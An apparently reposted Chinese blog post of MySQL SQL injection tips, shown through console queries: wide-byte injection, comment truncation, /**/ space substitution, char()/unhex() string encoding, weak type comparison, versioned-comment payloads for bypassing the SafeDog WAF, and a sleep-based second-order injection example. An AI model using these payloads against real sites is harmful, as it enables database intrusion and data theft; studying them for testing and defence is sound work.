那些容易被忽略、容易被弄错的地方
sql注入时的技巧
=========================================================================
* 如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。* 注释符的正确用法“-- ”才是mysql中的注释,注意后面有个空格mysql> select user() from (select 1)x where '1'='1';-- '+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)“#”注释,后面接不接空格无所谓mysql> select user() from (select 1) x where '1'='1';#'+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.00 sec)* 用/**/替代空格mysql> select/**/1;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)* sql语句中字符串转义- mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );+-------------------------------------------------------------------+| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |+-------------------------------------------------------------------+| /tmp/ |+-------------------------------------------------------------------+1 row in set (0.00 sec)- mysql> select concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+| /tmp/ |+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+1 row in set (0.00 sec)# utf-8- mysql> select unhex('E6B8B8E5AEA2'); +-----------------------+| unhex('E6B8B8E5AEA2') |+-----------------------+| 游客 |+-----------------------+1 row in set (0.00 sec)* 数字和字符的比较,类似php中的弱类型- mysql> select '10asfasfdeasdfasdf'=10;+-------------------------+| '10asfasfdeasdfasdf'=10 |+-------------------------+| 1 |+-------------------------+- mysql> select '0esfsadf'=0;+--------------+| '0esfsadf'=0 |+--------------+| 1 |+--------------+* 绕过安全狗** 正则绕过- select 1/*!50000union/*!*//*!50000select/*!*/2;+---+| 1 |+---+| 1 || 2 |+---+- mysql> select/*/#*/1;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)* 多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。- mysql> select '123''';+------+| 123' |+------+| 123' |+------+1 row in set (0.00 sec)- mysql> select '123''''';+-------+| 123'' |+-------+| 123'' |+-------+- mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'Empty set (1.00 sec)此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname'}但在插入到数据库后被还原,那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。
转载于:.html
本文发布于:2024-02-01 00:31:34,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170671869432515.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
